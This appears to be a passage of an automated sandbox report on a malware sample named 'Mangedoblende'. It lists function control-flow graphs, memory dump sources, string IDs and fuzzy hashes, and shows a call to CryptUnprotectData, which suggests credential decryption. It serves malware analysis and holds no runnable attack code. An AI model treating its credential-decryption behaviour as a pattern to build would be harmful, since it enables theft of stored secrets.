                                                                                                                                                                            control_flow_graph 1516 185362-185364 1517 1853c4-185484 call 1841a0 call 183cc0 1516->1517 1518 185366-1853a0 1516->1518 1530 18548b-1854a9 1517->1530 1531 185486 1517->1531 1519 1853a2 1518->1519 1520 1853a7-1853c2 1518->1520 1519->1520 1520->1517 1561 1854ac call 185658 1530->1561 1562 1854ac call 185649 1530->1562 1531->1530 1532 1854b2-1854bd 1533 1854bf 1532->1533 1534 1854c4-1854c8 1532->1534 1533->1534 1535 1854ca-1854cb 1534->1535 1536 1854cd-1854d4 1534->1536 1537 1854ec-185530 1535->1537 1538 1854db-1854e9 1536->1538 1539 1854d6 1536->1539 1543 185596-1855ad 1537->1543 1538->1537 1539->1538 1545 1855af-1855d4 1543->1545 1546 185532-185548 1543->1546 1552 1855ec 1545->1552 1553 1855d6-1855eb 1545->1553 1550 18554a-185556 1546->1550 1551 185572 1546->1551 1554 185558-18555e 1550->1554 1555 185560-185566 1550->1555 1556 185578-185595 1551->1556 1553->1552 1557 185570 1554->1557 1555->1557 1556->1543 1557->1556 1561->1532 1562->1532
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: cce358f22442a6299ec6ae90e89a3cb4ea4767a1bc0b860147a16757e4f98466
                                                                                                                                                                            • Instruction ID: 767092c9062031510e4b8b46128c2b9fed017a3a84df686fd74545f7d4784cc6
                                                                                                                                                                            • Opcode Fuzzy Hash: cce358f22442a6299ec6ae90e89a3cb4ea4767a1bc0b860147a16757e4f98466
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A91B574E00618DFDB14DFA9C984A9DBBF2FF89300F25906AE809AB365DB349945CF50
                                                                                                                                                                            Function 0018CA0F Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1563 18ca0f-18ca14 1564 18ca6d-18cb1c call 1841a0 call 183cc0 1563->1564 1565 18ca16-18ca38 1563->1565 1577 18cb1e 1564->1577 1578 18cb23-18cb44 call 185658 1564->1578 1566 18ca3a 1565->1566 1567 18ca3f-18ca6c 1565->1567 1566->1567 1567->1564 1577->1578 1580 18cb49-18cb54 1578->1580 1581 18cb5b-18cb5f 1580->1581 1582 18cb56 1580->1582 1583 18cb61-18cb62 1581->1583 1584 18cb64-18cb6b 1581->1584 1582->1581 1585 18cb83-18cbc7 1583->1585 1586 18cb6d 1584->1586 1587 18cb72-18cb80 1584->1587 1591 18cc2d-18cc44 1585->1591 1586->1587 1587->1585 1593 18cbc9-18cbdf 1591->1593 1594 18cc46-18cc6b 1591->1594 1598 18cc09 1593->1598 1599 18cbe1-18cbed 1593->1599 1601 18cc6d-18cc82 1594->1601 1602 18cc83 1594->1602 1600 18cc0f-18cc2c 1598->1600 1603 18cbef-18cbf5 1599->1603 1604 18cbf7-18cbfd 1599->1604 1600->1591 1601->1602 1605 18cc07 1603->1605 1604->1605 1605->1600
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: 0aceef73e0be682db0beb8cc650b224ecff79ed4523a58e521421a5524930beb
                                                                                                                                                                            • Instruction ID: 50b10b4527bf3dfb1dd57559c286fb2194a7e91ce76e9c72f9cad093a8042821
                                                                                                                                                                            • Opcode Fuzzy Hash: 0aceef73e0be682db0beb8cc650b224ecff79ed4523a58e521421a5524930beb
                                                                                                                                                                            • Instruction Fuzzy Hash: 9481B774E04618CFDB58DFAAD884A9DBBF2BF89300F24C069E419AB365DB349945CF50
                                                                                                                                                                            Function 0018D27D Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1697 18d27d-18d2a8 1698 18d2aa 1697->1698 1699 18d2af-18d38c call 1841a0 call 183cc0 1697->1699 1698->1699 1709 18d38e 1699->1709 1710 18d393-18d3b4 call 185658 1699->1710 1709->1710 1712 18d3b9-18d3c4 1710->1712 1713 18d3cb-18d3cf 1712->1713 1714 18d3c6 1712->1714 1715 18d3d1-18d3d2 1713->1715 1716 18d3d4-18d3db 1713->1716 1714->1713 1717 18d3f3-18d437 1715->1717 1718 18d3dd 1716->1718 1719 18d3e2-18d3f0 1716->1719 1723 18d49d-18d4b4 1717->1723 1718->1719 1719->1717 1725 18d439-18d44f 1723->1725 1726 18d4b6-18d4db 1723->1726 1730 18d479 1725->1730 1731 18d451-18d45d 1725->1731 1733 18d4dd-18d4f2 1726->1733 1734 18d4f3 1726->1734 1732 18d47f-18d49c 1730->1732 1735 18d45f-18d465 1731->1735 1736 18d467-18d46d 1731->1736 1732->1723 1733->1734 1737 18d477 1735->1737 1736->1737 1737->1732
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: 22a919302527b4652fccb10c39ac85abe10e28d4ac195bb7f6456882f877043d
                                                                                                                                                                            • Instruction ID: ce9436cbb5334a515163b4e2d843254cf64887d803e27a791c601a06fd231225
                                                                                                                                                                            • Opcode Fuzzy Hash: 22a919302527b4652fccb10c39ac85abe10e28d4ac195bb7f6456882f877043d
                                                                                                                                                                            • Instruction Fuzzy Hash: AC81B774E00218DFDB54DFAAD884A9DBBF2BF89300F24C069E819AB365DB349945CF50
                                                                                                                                                                            Function 0018C738 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1609 18c738-18c768 1610 18c76a 1609->1610 1611 18c76f-18c84c call 1841a0 call 183cc0 1609->1611 1610->1611 1621 18c84e 1611->1621 1622 18c853-18c874 call 185658 1611->1622 1621->1622 1624 18c879-18c884 1622->1624 1625 18c88b-18c88f 1624->1625 1626 18c886 1624->1626 1627 18c891-18c892 1625->1627 1628 18c894-18c89b 1625->1628 1626->1625 1629 18c8b3-18c8f7 1627->1629 1630 18c89d 1628->1630 1631 18c8a2-18c8b0 1628->1631 1635 18c95d-18c974 1629->1635 1630->1631 1631->1629 1637 18c8f9-18c90f 1635->1637 1638 18c976-18c99b 1635->1638 1642 18c939 1637->1642 1643 18c911-18c91d 1637->1643 1644 18c99d-18c9b2 1638->1644 1645 18c9b3 1638->1645 1648 18c93f-18c95c 1642->1648 1646 18c91f-18c925 1643->1646 1647 18c927-18c92d 1643->1647 1644->1645 1649 18c937 1646->1649 1647->1649 1648->1635 1649->1648
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: f563a125664e907428fcf45bb6964b04e0722e2d4b0c43b8932b3eea068e5d02
                                                                                                                                                                            • Instruction ID: decb27ff73246f836036c98f8a177a11947e34c4c81381e8c06690ac634a82a8
                                                                                                                                                                            • Opcode Fuzzy Hash: f563a125664e907428fcf45bb6964b04e0722e2d4b0c43b8932b3eea068e5d02
                                                                                                                                                                            • Instruction Fuzzy Hash: 8681B574E00218DFDB18DFAAD984A9DBBF2BF89300F24D069E419AB365DB349941CF50
                                                                                                                                                                            Function 0018CFA9 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1653 18cfa9-18cfd8 1654 18cfda 1653->1654 1655 18cfdf-18d0bc call 1841a0 call 183cc0 1653->1655 1654->1655 1665 18d0be 1655->1665 1666 18d0c3-18d0e4 call 185658 1655->1666 1665->1666 1668 18d0e9-18d0f4 1666->1668 1669 18d0fb-18d0ff 1668->1669 1670 18d0f6 1668->1670 1671 18d101-18d102 1669->1671 1672 18d104-18d10b 1669->1672 1670->1669 1673 18d123-18d167 1671->1673 1674 18d10d 1672->1674 1675 18d112-18d120 1672->1675 1679 18d1cd-18d1e4 1673->1679 1674->1675 1675->1673 1681 18d169-18d17f 1679->1681 1682 18d1e6-18d20b 1679->1682 1686 18d1a9 1681->1686 1687 18d181-18d18d 1681->1687 1688 18d20d-18d222 1682->1688 1689 18d223 1682->1689 1692 18d1af-18d1cc 1686->1692 1690 18d18f-18d195 1687->1690 1691 18d197-18d19d 1687->1691 1688->1689 1693 18d1a7 1690->1693 1691->1693 1692->1679 1693->1692
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: 43027e1db962a151873e8b952a540f7784a0887baf1941da7224bcfb107739d0
                                                                                                                                                                            • Instruction ID: c5ae682c88fad3439f84da11bd7347cc8c6b91f1771ea417f5559b1b2f57e14c
                                                                                                                                                                            • Opcode Fuzzy Hash: 43027e1db962a151873e8b952a540f7784a0887baf1941da7224bcfb107739d0
                                                                                                                                                                            • Instruction Fuzzy Hash: C981A574E00218DFDB58DFAAD884A9DBBF2BF88300F24C069E419AB365DB349941CF50
                                                                                                                                                                            Function 0018CCE1 Relevance: 6.4, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1741 18cce1-18cd08 1742 18cd0a 1741->1742 1743 18cd0f-18cdec call 1841a0 call 183cc0 1741->1743 1742->1743 1753 18cdee 1743->1753 1754 18cdf3-18ce14 call 185658 1743->1754 1753->1754 1756 18ce19-18ce24 1754->1756 1757 18ce2b-18ce2f 1756->1757 1758 18ce26 1756->1758 1759 18ce31-18ce32 1757->1759 1760 18ce34-18ce3b 1757->1760 1758->1757 1761 18ce53-18ce97 1759->1761 1762 18ce3d 1760->1762 1763 18ce42-18ce50 1760->1763 1767 18cefd-18cf14 1761->1767 1762->1763 1763->1761 1769 18ce99-18ceaf 1767->1769 1770 18cf16-18cf3b 1767->1770 1774 18ced9 1769->1774 1775 18ceb1-18cebd 1769->1775 1776 18cf3d-18cf52 1770->1776 1777 18cf53 1770->1777 1780 18cedf-18cefc 1774->1780 1778 18cebf-18cec5 1775->1778 1779 18cec7-18cecd 1775->1779 1776->1777 1781 18ced7 1778->1781 1779->1781 1780->1767 1781->1780
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
                                                                                                                                                                            • API String ID: 0-2617784740
                                                                                                                                                                            • Opcode ID: 4936b1e236d9cf7c431619948daa530a9d45b19c9f89523230e8eae62e1bb0fd
                                                                                                                                                                            • Instruction ID: cb469cb5fca0446b8b761a3856e90d754822cdc3a64839a9a76c73600f097178
                                                                                                                                                                            • Opcode Fuzzy Hash: 4936b1e236d9cf7c431619948daa530a9d45b19c9f89523230e8eae62e1bb0fd
                                                                                                                                                                            • Instruction Fuzzy Hash: 0081A474E00218DFDB54DFAAD984A9DBBF2BF88300F24C169E419AB365DB349985CF50
                                                                                                                                                                            Function 001829EC Relevance: 5.5, Strings: 4, Instructions: 489COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Xiq$Xiq$Xiq$Xiq
                                                                                                                                                                            • API String ID: 0-4026295062
                                                                                                                                                                            • Opcode ID: 42118b826b0b4255f6fc4d30f78d8004d4186f48e384f38c7a889c669ea2241e
                                                                                                                                                                            • Instruction ID: 0f99311c3f1b04d070d6db8312d7ae6535274d3ff9b5e4ba30f72c07dd4e6550
                                                                                                                                                                            • Opcode Fuzzy Hash: 42118b826b0b4255f6fc4d30f78d8004d4186f48e384f38c7a889c669ea2241e
                                                                                                                                                                            • Instruction Fuzzy Hash: 1802CE3584E3D44EC7634B798464296BFB0DF47A20B1E05EFC8C18B563E6295A4CCBA2
                                                                                                                                                                            Function 00186FC8 Relevance: 5.4, Strings: 4, Instructions: 448COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (oeq$(oeq$,iq$,iq
                                                                                                                                                                            • API String ID: 0-2093320806
                                                                                                                                                                            • Opcode ID: 735ebe9094e0fa448e3a48ab1b7c53737b0ab669ba9f178154c7a411de2f14c7
                                                                                                                                                                            • Instruction ID: dc57c3c4159f7e4ae6d796d465feee496cf1ecc5a2103ed331780207b1bce297
                                                                                                                                                                            • Opcode Fuzzy Hash: 735ebe9094e0fa448e3a48ab1b7c53737b0ab669ba9f178154c7a411de2f14c7
                                                                                                                                                                            • Instruction Fuzzy Hash: F0024171A08219DFCB15EF68C884AADBBF2FF49300F258059E815AB2A1D734EE41DF51
                                                                                                                                                                            Function 001869AD Relevance: 2.9, Strings: 2, Instructions: 447COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (oeq$Hiq
                                                                                                                                                                            • API String ID: 0-1760408109
                                                                                                                                                                            • Opcode ID: 552470a0d8db3f839e336cb8ffc3fc9d6be02dbc0e3253e0e488b3a624be7e37
                                                                                                                                                                            • Instruction ID: fc3cbd556aa4de9721af9da967ad360a38013a882573537b023b8bbd49a33357
                                                                                                                                                                            • Opcode Fuzzy Hash: 552470a0d8db3f839e336cb8ffc3fc9d6be02dbc0e3253e0e488b3a624be7e37
                                                                                                                                                                            • Instruction Fuzzy Hash: E2024E70B002199FDB15EF69C854AAEBBB6BF88300F208559E945DB395DF349E41CF90
                                                                                                                                                                            Function 00183E09 Relevance: 2.8, Strings: 2, Instructions: 267COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Xiq$$eq
                                                                                                                                                                            • API String ID: 0-3760103188
                                                                                                                                                                            • Opcode ID: e09e7adba72fa3b6e535752de03eeec327e543786a05d5b29687530ecd020f73
                                                                                                                                                                            • Instruction ID: 1bbdf541af034d312ce9a108b4b5e102c036cf9fb7ac86c33e41f5d6b48935f3
                                                                                                                                                                            • Opcode Fuzzy Hash: e09e7adba72fa3b6e535752de03eeec327e543786a05d5b29687530ecd020f73
                                                                                                                                                                            • Instruction Fuzzy Hash: 0391C474B04319DBDB0CABB898542BFBBB7BFC8700B158A1DE502E7294DF3499019B95
                                                                                                                                                                            Function 225B9328 Relevance: 2.0, APIs: 1, Instructions: 531COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0c57149cca785dfb70b85e44c7fbff2f3220fa8b15e364fef6e8c765584db8be
                                                                                                                                                                            • Instruction ID: a0aec2e279bd0f7b186ed7ec6e05d19a403b0dfd5872c969b7bcb38c67cf7de7
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c57149cca785dfb70b85e44c7fbff2f3220fa8b15e364fef6e8c765584db8be
                                                                                                                                                                            • Instruction Fuzzy Hash: 03222A74E002198FDB24DFA9C984B9DBBB2BF89304F10C5A9D409AB395DB359E85CF50
                                                                                                                                                                            Function 227A8EF1 Relevance: 1.6, APIs: 1, Instructions: 56encryptionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 227A8F5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 834300711-0
                                                                                                                                                                            • Opcode ID: 26767c599ac5e2781cacc615f54946ac5cd47ae60f8e90747a1b81fe0ecec049
                                                                                                                                                                            • Instruction ID: 842f0ee1092fbe27d40e13da7f62f0f04454f651ba801ff7580cb879a5afd085
                                                                                                                                                                            • Opcode Fuzzy Hash: 26767c599ac5e2781cacc615f54946ac5cd47ae60f8e90747a1b81fe0ecec049
                                                                                                                                                                            • Instruction Fuzzy Hash: 7421ACB2800249DFCB10CFA9C985BDEBFF1EF48320F14845AE958A7201C339A550DFA0
                                                                                                                                                                            Function 227A87C0 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 227A8F5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 834300711-0
                                                                                                                                                                            • Opcode ID: d22d70882f7a2081bf4a1a621eca2ceb43f57d44802dc67091e6df896a1f1444
                                                                                                                                                                            • Instruction ID: fd13c0b0105a7770527e7e61775c1729d5070ccba04e56d57899bc810c9e76ce
                                                                                                                                                                            • Opcode Fuzzy Hash: d22d70882f7a2081bf4a1a621eca2ceb43f57d44802dc67091e6df896a1f1444
                                                                                                                                                                            • Instruction Fuzzy Hash: 231114B6804249DFDB10CF99C944BDEBFF5EF48320F148459EA18A7211C379A950DFA5
                                                                                                                                                                            Function 2283D710 Relevance: .7, Instructions: 745COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ff65e8dc05f4788c6dd7bafec02fe28b326de4615585c6b701ae103d09d949b2
                                                                                                                                                                            • Instruction ID: 07910404a61ca01e6f94583b41e3cffb2a7967ab1e594a3130b3549948042c63
                                                                                                                                                                            • Opcode Fuzzy Hash: ff65e8dc05f4788c6dd7bafec02fe28b326de4615585c6b701ae103d09d949b2
                                                                                                                                                                            • Instruction Fuzzy Hash: D5825C74E012288FDB65DF69C994BDDBBB2AF89300F1081E9E90DA7265DB355E81CF40
                                                                                                                                                                            Function 225B0B30 Relevance: .7, Instructions: 709COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: bc314a0bcd879f8343084e3d127838100832cf9822a3dc05407370c4fe6bf136
                                                                                                                                                                            • Instruction ID: a398d0a20c1b93d1f4b5c9c6133400c057568e49275049b3941021bf141cee7f
                                                                                                                                                                            • Opcode Fuzzy Hash: bc314a0bcd879f8343084e3d127838100832cf9822a3dc05407370c4fe6bf136
                                                                                                                                                                            • Instruction Fuzzy Hash: CF72BC74E052298FDB64DF69C984BDDBBB2BF49304F1491E9D408A7265EB34AE81CF40
                                                                                                                                                                            Function 22815FD8 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 53865184edffa9e7e25d2672b66b836ce43d9978766a6dd696f7be24dc012fac
                                                                                                                                                                            • Instruction ID: 9ccf45a147cad36e729619693be06d33dd1abcf94539dfb31626d79db53f46d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 53865184edffa9e7e25d2672b66b836ce43d9978766a6dd696f7be24dc012fac
                                                                                                                                                                            • Instruction Fuzzy Hash: F0E1C0B4D00218CFDB25DFA5C944B9DBBB2BF89304F6081A9D508BB3A5DB359A85CF14
                                                                                                                                                                            Function 227A7B78 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4800c58197d24d232a5bb66eaaa2e230c7d8c060e139d11dc3b0250a4e41589d
                                                                                                                                                                            • Instruction ID: 45c32c23072f32e33cb3d2da4ff7e137774fdcb5d6d4274c8ea8852f77d97f76
                                                                                                                                                                            • Opcode Fuzzy Hash: 4800c58197d24d232a5bb66eaaa2e230c7d8c060e139d11dc3b0250a4e41589d
                                                                                                                                                                            • Instruction Fuzzy Hash: C6E1B174E05218CFDB54DFA5C994B9DBBB2BF89304F2081A9D408A7395DB359A85CF10
                                                                                                                                                                            Function 2281CAE0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 222f0bc24497495e0810c9798f2d1042290f1b4d961374cd9ad7c430190e4263
                                                                                                                                                                            • Instruction ID: efcbf89b9ee1ebaf50919a16a46e19e1d1c3a8e011856617db691116fd4034b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 222f0bc24497495e0810c9798f2d1042290f1b4d961374cd9ad7c430190e4263
                                                                                                                                                                            • Instruction Fuzzy Hash: AAD18F74E05318CFDB15DFA5C984B9DBBB2BF89300F2081A9D508A72A5DB349E81DF51
                                                                                                                                                                            Function 22816678 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 546c932f00102b2fbede699fd29b24bdf9fafddc859d7d1b2e36be14b44d0866
                                                                                                                                                                            • Instruction ID: 5d4e93b89bd663ae81a905d28afde59d6088a435e754f8f8665f3b58acaf7867
                                                                                                                                                                            • Opcode Fuzzy Hash: 546c932f00102b2fbede699fd29b24bdf9fafddc859d7d1b2e36be14b44d0866
                                                                                                                                                                            • Instruction Fuzzy Hash: 13D18F74E04318CFDB55DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Function 22841CF0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
